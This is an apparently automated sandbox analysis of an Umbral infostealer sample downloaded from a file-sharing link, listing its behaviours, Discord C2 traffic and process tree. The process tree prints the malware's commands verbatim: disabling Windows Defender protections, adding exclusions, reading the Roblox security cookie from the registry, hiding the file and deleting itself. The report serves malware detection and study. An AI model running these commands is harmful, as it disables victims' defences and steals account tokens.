umbral | hxxps://gofile[.]io/d/FAdHjT

Analysis

max time kernel
77s
max time network
78s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
01-01-2025 00:58

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://gofile.io/d/FAdHjT

Score

10^/10

umbral discovery execution spyware stealer

Malware Config

Signatures

Detect Umbral payload 2 IoCs

resource	yara_rule
behavioral1/files/0x000e000000023b46-73.dat	family_umbral
behavioral1/memory/3000-85-0x0000023035CB0000-0x0000023035D32000-memory.dmp	family_umbral

Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral
Umbral family
umbral

Command and Scripting Interpreter: PowerShell 1 TTPs 12 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
3808	powershell.exe
3188	powershell.exe
1168	powershell.exe
4604	powershell.exe
4528	powershell.exe
3400	powershell.exe
4264	powershell.exe
2700	powershell.exe
2804	powershell.exe
4864	powershell.exe
1264	powershell.exe
4388	powershell.exe

Downloads MZ/PE file

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	OPSECTECH.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	OPSECTECH.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	OPSECTECH.exe

Executes dropped EXE 6 IoCs

pid	Process
3000	OPSECTECH.exe
4380	OPSECTECH.exe
3148	OPSECTECH.exe
4504	OPSECTECH.exe
3552	OPSECTECH.exe
2600	OPSECTECH.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs

Web Service

T1102

flow	ioc
84	discord.com
54	discord.com
55	discord.com
64	discord.com
65	discord.com
83	discord.com

Looks up external IP address via web service 3 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
43	ip-api.com
59	ip-api.com
79	ip-api.com

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 6 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
4864	cmd.exe
456	PING.EXE
4860	cmd.exe
456	PING.EXE
5280	cmd.exe
5320	PING.EXE

Detects videocard installed 1 TTPs 3 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
3172	wmic.exe
4264	wmic.exe
5128	wmic.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133801667369063977"	chrome.exe

Runs ping.exe 1 TTPs 3 IoCs

Remote System Discovery

T1018

pid	Process
456	PING.EXE
456	PING.EXE
5320	PING.EXE

Suspicious behavior: EnumeratesProcesses 52 IoCs

pid	Process
3820	chrome.exe
3820	chrome.exe
3000	OPSECTECH.exe
3000	OPSECTECH.exe
3808	powershell.exe
3808	powershell.exe
3808	powershell.exe
4864	powershell.exe
4864	powershell.exe
4864	powershell.exe
1264	powershell.exe
1264	powershell.exe
1264	powershell.exe
3156	powershell.exe
3156	powershell.exe
3156	powershell.exe
4264	powershell.exe
4264	powershell.exe
4264	powershell.exe
3148	OPSECTECH.exe
3148	OPSECTECH.exe
3188	powershell.exe
3188	powershell.exe
3188	powershell.exe
4388	powershell.exe
4388	powershell.exe
4388	powershell.exe
2700	powershell.exe
2700	powershell.exe
2700	powershell.exe
2804	powershell.exe
2804	powershell.exe
2804	powershell.exe
2600	OPSECTECH.exe
2600	OPSECTECH.exe
1168	powershell.exe
1168	powershell.exe
1168	powershell.exe
4604	powershell.exe
4604	powershell.exe
4604	powershell.exe
4528	powershell.exe
4528	powershell.exe
4528	powershell.exe
668	powershell.exe
668	powershell.exe
668	powershell.exe
3400	powershell.exe
3400	powershell.exe
3400	powershell.exe
3188	msedge.exe
3188	msedge.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs

pid	Process
3820	chrome.exe
3820	chrome.exe
3820	chrome.exe
3820	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	3820	chrome.exe
Token: SeCreatePagefilePrivilege	3820	chrome.exe
Token: SeShutdownPrivilege	3820	chrome.exe
Token: SeCreatePagefilePrivilege	3820	chrome.exe
Token: SeShutdownPrivilege	3820	chrome.exe
Token: SeCreatePagefilePrivilege	3820	chrome.exe
Token: SeShutdownPrivilege	3820	chrome.exe
Token: SeCreatePagefilePrivilege	3820	chrome.exe
Token: SeShutdownPrivilege	3820	chrome.exe
Token: SeCreatePagefilePrivilege	3820	chrome.exe
Token: SeShutdownPrivilege	3820	chrome.exe
Token: SeCreatePagefilePrivilege	3820	chrome.exe
Token: SeShutdownPrivilege	3820	chrome.exe
Token: SeCreatePagefilePrivilege	3820	chrome.exe
Token: SeShutdownPrivilege	3820	chrome.exe
Token: SeCreatePagefilePrivilege	3820	chrome.exe
Token: SeShutdownPrivilege	3820	chrome.exe
Token: SeCreatePagefilePrivilege	3820	chrome.exe
Token: SeShutdownPrivilege	3820	chrome.exe
Token: SeCreatePagefilePrivilege	3820	chrome.exe
Token: SeShutdownPrivilege	3820	chrome.exe
Token: SeCreatePagefilePrivilege	3820	chrome.exe
Token: SeShutdownPrivilege	3820	chrome.exe
Token: SeCreatePagefilePrivilege	3820	chrome.exe
Token: SeShutdownPrivilege	3820	chrome.exe
Token: SeCreatePagefilePrivilege	3820	chrome.exe
Token: SeShutdownPrivilege	3820	chrome.exe
Token: SeCreatePagefilePrivilege	3820	chrome.exe
Token: SeShutdownPrivilege	3820	chrome.exe
Token: SeCreatePagefilePrivilege	3820	chrome.exe
Token: SeShutdownPrivilege	3820	chrome.exe
Token: SeCreatePagefilePrivilege	3820	chrome.exe
Token: SeShutdownPrivilege	3820	chrome.exe
Token: SeCreatePagefilePrivilege	3820	chrome.exe
Token: SeShutdownPrivilege	3820	chrome.exe
Token: SeCreatePagefilePrivilege	3820	chrome.exe
Token: SeDebugPrivilege	3000	OPSECTECH.exe
Token: SeIncreaseQuotaPrivilege	748	wmic.exe
Token: SeSecurityPrivilege	748	wmic.exe
Token: SeTakeOwnershipPrivilege	748	wmic.exe
Token: SeLoadDriverPrivilege	748	wmic.exe
Token: SeSystemProfilePrivilege	748	wmic.exe
Token: SeSystemtimePrivilege	748	wmic.exe
Token: SeProfSingleProcessPrivilege	748	wmic.exe
Token: SeIncBasePriorityPrivilege	748	wmic.exe
Token: SeCreatePagefilePrivilege	748	wmic.exe
Token: SeBackupPrivilege	748	wmic.exe
Token: SeRestorePrivilege	748	wmic.exe
Token: SeShutdownPrivilege	748	wmic.exe
Token: SeDebugPrivilege	748	wmic.exe
Token: SeSystemEnvironmentPrivilege	748	wmic.exe
Token: SeRemoteShutdownPrivilege	748	wmic.exe
Token: SeUndockPrivilege	748	wmic.exe
Token: SeManageVolumePrivilege	748	wmic.exe
Token: 33	748	wmic.exe
Token: 34	748	wmic.exe
Token: 35	748	wmic.exe
Token: 36	748	wmic.exe
Token: SeShutdownPrivilege	3820	chrome.exe
Token: SeCreatePagefilePrivilege	3820	chrome.exe
Token: SeIncreaseQuotaPrivilege	748	wmic.exe
Token: SeSecurityPrivilege	748	wmic.exe
Token: SeTakeOwnershipPrivilege	748	wmic.exe
Token: SeLoadDriverPrivilege	748	wmic.exe

Suspicious use of FindShellTrayWindow 35 IoCs

pid	Process
3820	chrome.exe
3820	chrome.exe
3820	chrome.exe
3820	chrome.exe
3820	chrome.exe
3820	chrome.exe
3820	chrome.exe
3820	chrome.exe
3820	chrome.exe
3820	chrome.exe
3820	chrome.exe
3820	chrome.exe
3820	chrome.exe
3820	chrome.exe
3820	chrome.exe
3820	chrome.exe
3820	chrome.exe
3820	chrome.exe
3820	chrome.exe
3820	chrome.exe
3820	chrome.exe
3820	chrome.exe
3820	chrome.exe
3820	chrome.exe
3820	chrome.exe
3820	chrome.exe
3820	chrome.exe
3820	chrome.exe
3820	chrome.exe
3820	chrome.exe
3820	chrome.exe
3820	chrome.exe
3820	chrome.exe
3820	chrome.exe
3820	chrome.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
3820	chrome.exe
3820	chrome.exe
3820	chrome.exe
3820	chrome.exe
3820	chrome.exe
3820	chrome.exe
3820	chrome.exe
3820	chrome.exe
3820	chrome.exe
3820	chrome.exe
3820	chrome.exe
3820	chrome.exe
3820	chrome.exe
3820	chrome.exe
3820	chrome.exe
3820	chrome.exe
3820	chrome.exe
3820	chrome.exe
3820	chrome.exe
3820	chrome.exe
3820	chrome.exe
3820	chrome.exe
3820	chrome.exe
3820	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3820 wrote to memory of 3424	3820	chrome.exe	85
PID 3820 wrote to memory of 3424	3820	chrome.exe	85
PID 3820 wrote to memory of 2872	3820	chrome.exe	86
PID 3820 wrote to memory of 2872	3820	chrome.exe	86
PID 3820 wrote to memory of 2872	3820	chrome.exe	86
PID 3820 wrote to memory of 2872	3820	chrome.exe	86
PID 3820 wrote to memory of 2872	3820	chrome.exe	86
PID 3820 wrote to memory of 2872	3820	chrome.exe	86
PID 3820 wrote to memory of 2872	3820	chrome.exe	86
PID 3820 wrote to memory of 2872	3820	chrome.exe	86
PID 3820 wrote to memory of 2872	3820	chrome.exe	86
PID 3820 wrote to memory of 2872	3820	chrome.exe	86
PID 3820 wrote to memory of 2872	3820	chrome.exe	86
PID 3820 wrote to memory of 2872	3820	chrome.exe	86
PID 3820 wrote to memory of 2872	3820	chrome.exe	86
PID 3820 wrote to memory of 2872	3820	chrome.exe	86
PID 3820 wrote to memory of 2872	3820	chrome.exe	86
PID 3820 wrote to memory of 2872	3820	chrome.exe	86
PID 3820 wrote to memory of 2872	3820	chrome.exe	86
PID 3820 wrote to memory of 2872	3820	chrome.exe	86
PID 3820 wrote to memory of 2872	3820	chrome.exe	86
PID 3820 wrote to memory of 2872	3820	chrome.exe	86
PID 3820 wrote to memory of 2872	3820	chrome.exe	86
PID 3820 wrote to memory of 2872	3820	chrome.exe	86
PID 3820 wrote to memory of 2872	3820	chrome.exe	86
PID 3820 wrote to memory of 2872	3820	chrome.exe	86
PID 3820 wrote to memory of 2872	3820	chrome.exe	86
PID 3820 wrote to memory of 2872	3820	chrome.exe	86
PID 3820 wrote to memory of 2872	3820	chrome.exe	86
PID 3820 wrote to memory of 2872	3820	chrome.exe	86
PID 3820 wrote to memory of 2872	3820	chrome.exe	86
PID 3820 wrote to memory of 2872	3820	chrome.exe	86
PID 3820 wrote to memory of 1800	3820	chrome.exe	87
PID 3820 wrote to memory of 1800	3820	chrome.exe	87
PID 3820 wrote to memory of 2824	3820	chrome.exe	88
PID 3820 wrote to memory of 2824	3820	chrome.exe	88
PID 3820 wrote to memory of 2824	3820	chrome.exe	88
PID 3820 wrote to memory of 2824	3820	chrome.exe	88
PID 3820 wrote to memory of 2824	3820	chrome.exe	88
PID 3820 wrote to memory of 2824	3820	chrome.exe	88
PID 3820 wrote to memory of 2824	3820	chrome.exe	88
PID 3820 wrote to memory of 2824	3820	chrome.exe	88
PID 3820 wrote to memory of 2824	3820	chrome.exe	88
PID 3820 wrote to memory of 2824	3820	chrome.exe	88
PID 3820 wrote to memory of 2824	3820	chrome.exe	88
PID 3820 wrote to memory of 2824	3820	chrome.exe	88
PID 3820 wrote to memory of 2824	3820	chrome.exe	88
PID 3820 wrote to memory of 2824	3820	chrome.exe	88
PID 3820 wrote to memory of 2824	3820	chrome.exe	88
PID 3820 wrote to memory of 2824	3820	chrome.exe	88
PID 3820 wrote to memory of 2824	3820	chrome.exe	88
PID 3820 wrote to memory of 2824	3820	chrome.exe	88
PID 3820 wrote to memory of 2824	3820	chrome.exe	88
PID 3820 wrote to memory of 2824	3820	chrome.exe	88
PID 3820 wrote to memory of 2824	3820	chrome.exe	88
PID 3820 wrote to memory of 2824	3820	chrome.exe	88
PID 3820 wrote to memory of 2824	3820	chrome.exe	88
PID 3820 wrote to memory of 2824	3820	chrome.exe	88
PID 3820 wrote to memory of 2824	3820	chrome.exe	88
PID 3820 wrote to memory of 2824	3820	chrome.exe	88
PID 3820 wrote to memory of 2824	3820	chrome.exe	88
PID 3820 wrote to memory of 2824	3820	chrome.exe	88
PID 3820 wrote to memory of 2824	3820	chrome.exe	88
PID 3820 wrote to memory of 2824	3820	chrome.exe	88

Views/modifies file attributes 1 TTPs 3 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
4264	attrib.exe
4964	attrib.exe
748	attrib.exe

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://gofile.io/d/FAdHjT
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3820
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffe069fcc40,0x7ffe069fcc4c,0x7ffe069fcc58
  2⤵
  PID:3424
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1916,i,4668790744194854408,13192120696810765297,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1904 /prefetch:2
  2⤵
  PID:2872
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1828,i,4668790744194854408,13192120696810765297,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1948 /prefetch:3
  2⤵
  PID:1800
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2236,i,4668790744194854408,13192120696810765297,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2588 /prefetch:8
  2⤵
  PID:2824
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3124,i,4668790744194854408,13192120696810765297,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3144 /prefetch:1
  2⤵
  PID:2372
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3140,i,4668790744194854408,13192120696810765297,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3260 /prefetch:1
  2⤵
  PID:2912
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4528,i,4668790744194854408,13192120696810765297,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3704 /prefetch:1
  2⤵
  PID:1144
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=3420,i,4668790744194854408,13192120696810765297,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3520 /prefetch:8
  2⤵
  PID:468
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --field-trial-handle=4724,i,4668790744194854408,13192120696810765297,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4692 /prefetch:1
  2⤵
  PID:2244
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=5148,i,4668790744194854408,13192120696810765297,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5180 /prefetch:8
  2⤵
  PID:2900
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=5152,i,4668790744194854408,13192120696810765297,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5284 /prefetch:8
  2⤵
  PID:2136
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4072,i,4668790744194854408,13192120696810765297,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4624 /prefetch:8
  2⤵
  PID:3620
- C:\Users\Admin\Downloads\OPSECTECH.exe
  "C:\Users\Admin\Downloads\OPSECTECH.exe"
  2⤵
  - Drops file in Drivers directory
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3000
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" csproduct get uuid
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:748
- - C:\Windows\SYSTEM32\attrib.exe
    "attrib.exe" +h +s "C:\Users\Admin\Downloads\OPSECTECH.exe"
    3⤵
    - Views/modifies file attributes
    PID:4264
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\OPSECTECH.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:3808
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:4864
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:1264
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:3156
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" os get Caption
    3⤵
    PID:4180
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" computersystem get totalphysicalmemory
    3⤵
    PID:4840
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" csproduct get uuid
    3⤵
    PID:4592
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:4264
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic" path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:3172
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\Downloads\OPSECTECH.exe" && pause
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    PID:4864
  - - C:\Windows\system32\PING.EXE
      ping localhost
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      Runs ping.exe
      PID:456
- C:\Users\Admin\Downloads\OPSECTECH.exe
  "C:\Users\Admin\Downloads\OPSECTECH.exe"
  2⤵
  - Executes dropped EXE
  PID:4380
- C:\Users\Admin\Downloads\OPSECTECH.exe
  "C:\Users\Admin\Downloads\OPSECTECH.exe"
  2⤵
  - Drops file in Drivers directory
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  PID:3148
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" csproduct get uuid
    3⤵
    PID:3760
- - C:\Windows\SYSTEM32\attrib.exe
    "attrib.exe" +h +s "C:\Users\Admin\Downloads\OPSECTECH.exe"
    3⤵
    - Views/modifies file attributes
    PID:4964
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\OPSECTECH.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:3188
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:4388
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:2700
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    PID:4932
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" os get Caption
    3⤵
    PID:2912
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" computersystem get totalphysicalmemory
    3⤵
    PID:3560
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" csproduct get uuid
    3⤵
    PID:1308
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:2804
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic" path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:4264
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\Downloads\OPSECTECH.exe" && pause
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    PID:4860
  - - C:\Windows\system32\PING.EXE
      ping localhost
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      Runs ping.exe
      PID:456
- C:\Users\Admin\Downloads\OPSECTECH.exe
  "C:\Users\Admin\Downloads\OPSECTECH.exe"
  2⤵
  - Executes dropped EXE
  PID:4504
- C:\Users\Admin\Downloads\OPSECTECH.exe
  "C:\Users\Admin\Downloads\OPSECTECH.exe"
  2⤵
  - Executes dropped EXE
  PID:3552
- C:\Users\Admin\Downloads\OPSECTECH.exe
  "C:\Users\Admin\Downloads\OPSECTECH.exe"
  2⤵
  - Drops file in Drivers directory
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  PID:2600
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" csproduct get uuid
    3⤵
    PID:2496
- - C:\Windows\SYSTEM32\attrib.exe
    "attrib.exe" +h +s "C:\Users\Admin\Downloads\OPSECTECH.exe"
    3⤵
    - Views/modifies file attributes
    PID:748
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\OPSECTECH.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:1168
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:4604
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:4528
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:668
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" os get Caption
    3⤵
    PID:1844
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" computersystem get totalphysicalmemory
    3⤵
    PID:4604
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" csproduct get uuid
    3⤵
    PID:1292
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:3400
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic" path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:5128
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\Downloads\OPSECTECH.exe" && pause
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    PID:5280
  - - C:\Windows\system32\PING.EXE
      ping localhost
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      Runs ping.exe
      PID:5320

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:3916

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:1228

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
